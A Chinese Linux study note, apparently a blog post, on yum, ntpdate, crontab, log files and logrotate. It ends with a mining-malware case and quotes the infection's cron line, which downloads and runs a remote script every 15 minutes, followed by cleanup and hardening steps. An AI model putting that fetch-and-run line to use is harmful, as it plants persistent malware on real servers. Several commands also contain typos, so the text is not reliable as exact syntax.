Linux基础学习（十一）— yum版本升级、ntp自动对时、计划任务、日志查看及日志轮转

Linux基础学习（十一）

yum版本升级、ntp自动对时、计划任务、日志查看及日志轮转

which httpd 查询命令位置
yum update 更新yum里面软件版本
yum clean all 清除yum缓存（使用查找前记得清除缓存）

yum list | grep php 列出yum里边php 的全部软件包

yum makecache 是 将服务器上的软件包信息 现在本地缓存,以提高搜索 安装软件的速度

请使用时间自动对时，调整服务器的初始化时间

使用ntpdate -s

yum -y install ntpdate 安装时间对时命令， 然后和时间服务器进行对时
ntpdate -s pool.ntp.org
或ntpdate -u ntp1.aliyun.com

计划任务：

crontab -e 编辑计划任务
crond 进程每分钟会处理一次计划任务

常见的日志文件（系统、进程、应用程序）

tail /var/log/messages //系统主日志文件
crondtail -20 /var/log/messages //查看后20行 系统主日志文件
tail -f /var/log/messages //动态查看日志文件的尾部 tail -f 也就是 tailf 动态显示日志
tailf /var/log/secure //认证、安全日志
tail /var/log/cron //计划任务日志
tail /var/log/yum.log //软件包安装日志

grep “Acckepted” /var/log/secure 过滤系统登录过用户的日志
grep “Failed” /var/log/secure 过滤系统登录不上用户的日志

日志轮转

/usr/sbin/logrotate /etc/logrotate.conf 强制手动轮转 加载配置文件

vim /etc/logrotate.d/yum 修改配置文件

missingok //丢失不提醒
notifempty //空文件不轮转
maxsize 30k //到了30k就轮转（重新生成一份新的文件）
yearly //一年轮转一次
create 0600 root root //创建的文件权限为0600 属主属组为root
rotate 3 //保留三份 （三天）

执行轮转配置文件 查看 /var/log/yum.*
查看新的日志文件是否生成

※知识点

一、老大说请同意测试和线上环境：

1首先统一操作系统版本–>统一环境–>统一安装包环境。必须一模一样 的需求环境。
2安装最新版的xxx服务（或者指定的版本）–官网找包，下载包，然后上传到服务器上搭建小的线上服务
（建议在相同环境虚拟搭建一遍，然后等搭建成功，解决完问题后，再去物理机或云服务器部署）【避免线上环境不纯洁，影响服务。】

二、某公司的一台服务器中了挖矿病毒，长时间的在进行比特币的运算。

通过计划任务 */15 * * * * weget www.muma.com/1.sh | ./1.sh 访问他自己的网站，然后wget 去下载并执行脚本。

机器的CPU 会长时间 使用率特别高

并且计划任务删不掉。怎么做/h5>

1 写防火墙规则 禁止网站的访问
2 关闭计划任务的守护进程，停止计划任务crond
3 清除 /root/.ssh 文件里面的秘钥
4 只允许本机用户普通账号登录
5 禁止root远程登录
6 取消脚本的执行权限
7 修改ssh的默认端口
8 一般除了有非常重要的数据外，我们都是直接重装系统，后加固。

---

---

文章知识点与官方知识档案匹配，可进一步学习相关知识CS入门技能树Linux入门初识Linux24700 人正在系统学习中

来源：Nekoosu